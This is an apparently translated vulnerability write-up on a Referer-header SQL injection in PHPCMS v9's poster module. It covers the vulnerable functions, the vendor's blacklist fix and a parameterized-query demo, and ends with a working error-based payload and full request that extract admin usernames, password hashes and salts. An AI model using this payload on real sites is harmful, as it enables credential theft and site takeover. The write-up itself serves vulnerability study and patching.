PHPCMSv9 SQL Injection (Referer Injection)


From: http://huakai.paxmac.org/?p=522

360 reported this vulnerability at http://webscan.360.cn/news/news84, but the key parts were blurred out, so based on an analysis of the flaw the exploitation method is given here.
The report above already explains it in detail: the poster_click function does not filter the HTTP Referer before inserting it into the database, which produces the injection.

public function poster_click() {
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // HTTP_REFERER comes straight from the request and is written to the
        // click table without any filtering: this is the injection point.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}

The same problem appears in the show_stat function:

protected function show_stat($siteid = 0, $spaceid = 0, $id = 0) {
    $M = new_html_special_chars(getcache('poster', 'commons'));
    if($M['enablehits']==0) return true;
    //$siteid = intval($siteid);
    $spaceid = intval($spaceid);
    $id = intval($id);
    if(!$id) return false;
    if(!$siteid || !$spaceid) {
        $r = $this->db->get_one(array('id'=>$id), 'siteid, spaceid');
        $siteid = $r['id'];
        $spaceid = $r['spaceid'];
    }
    $ip = ip();
    $ip_area = pc_base::load_sys_class('ip_area');
    $area = $ip_area->get($ip);
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    $this->db->update(array('hits'=>'+=1'), array('id'=>$id));
    // Same pattern as poster_click: the unfiltered Referer is stored directly.
    $this->s_db->insert(array('pid'=>$id, 'siteid'=>$siteid, 'spaceid'=>$spaceid, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=>0));
    return true;
}

However, the vendor has since patched both of these points.
The official fix:
safe_replace(HTTP_REFERER), which filters the value before it is stored.

// Blacklist-style filter applied to the Referer in the official fix.
function safe_replace($string) {
    $string = str_replace('%20','',$string);
    $string = str_replace('%27','',$string);
    $string = str_replace('%2527','',$string);
    $string = str_replace('*','',$string);
    $string = str_replace('"','&quot;',$string);
    $string = str_replace("'",'',$string);
    $string = str_replace('"','',$string);
    $string = str_replace(';','',$string);
    $string = str_replace('<','&lt;',$string);
    $string = str_replace('>','&gt;',$string);
    $string = str_replace("{",'',$string);
    $string = str_replace('}','',$string);
    $string = str_replace('//','',$string);
    return $string;
}
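As an added illustration of the flaw described above and of the fix (this is not PHPCMS code and not from the original post), here is the poster_click Referer insert written with string concatenation beside the same insert with a bound parameter, run against an in-memory SQLite database through PDO. It assumes the pdo_sqlite extension is available; the table, columns, timestamp and hostile Referer value are constructed for the demo.

```php
<?php
// Added example, not PHPCMS code: the Referer insert written with string
// concatenation (the flaw) and with a bound parameter (the fix), run against
// an in-memory SQLite database via PDO. Table and columns are constructed for
// this demo and only loosely follow PHPCMS.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE click_log (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    pid INTEGER NOT NULL,
    referer TEXT NOT NULL,
    clicktime INTEGER NOT NULL)');

// Flawed pattern: the raw header becomes part of the SQL text, so a single
// quote in it closes the string literal and the rest is parsed as SQL.
function log_click_unsafe(PDO $db, int $pid, string $referer, int $now): void {
    $sql = "INSERT INTO click_log (pid, referer, clicktime) VALUES ("
         . "$pid, '$referer', $now)";
    $db->exec($sql);
}

// Hardened pattern: the header is bound as a value; the SQL text is fixed.
function log_click_safe(PDO $db, int $pid, string $referer, int $now): void {
    $stmt = $db->prepare(
        'INSERT INTO click_log (pid, referer, clicktime) VALUES (?, ?, ?)');
    $stmt->execute([$pid, $referer, $now]);
}

// Constructed hostile Referer: closes the literal, supplies its own
// clicktime of 0 and comments out the remainder of the statement.
$hostile = "http://example.invalid/', 0)-- ";
$now = 1357654308; // constructed timestamp for the demo

log_click_unsafe($db, 1, $hostile, $now);
log_click_safe($db, 1, $hostile, $now);

// Row 1 came from the flawed insert, row 2 from the parameterized one.
// "stored_intact" is yes only when the full header text and the real
// timestamp were stored, i.e. nothing in the header was interpreted as SQL.
foreach ($db->query('SELECT id, referer, clicktime FROM click_log ORDER BY id') as $row) {
    $intact = ($row['referer'] === $hostile && (int)$row['clicktime'] === $now);
    printf("row %d: referer=%s clicktime=%d stored_intact=%s\n",
        $row['id'], $row['referer'], $row['clicktime'], $intact ? 'yes' : 'no');
}
```

The blacklist in safe_replace only strips particular characters; binding the header as a parameter removes the class of bug regardless of which characters the header contains.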

EXP:

http://www.0day5.com/index.php?m=poster&c=index&a=poster_click&id=1

Referer:http://www.0day5.com',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#

The modified HTTP request headers look like this:

Host: www.0day5.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=97895523-1357654308-&ntime=1357654308&cnzz_a=0&retime=1357654307516&sin=&ltime=1357654307516&rtime=0
Referer:http://www.0day5.com',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#
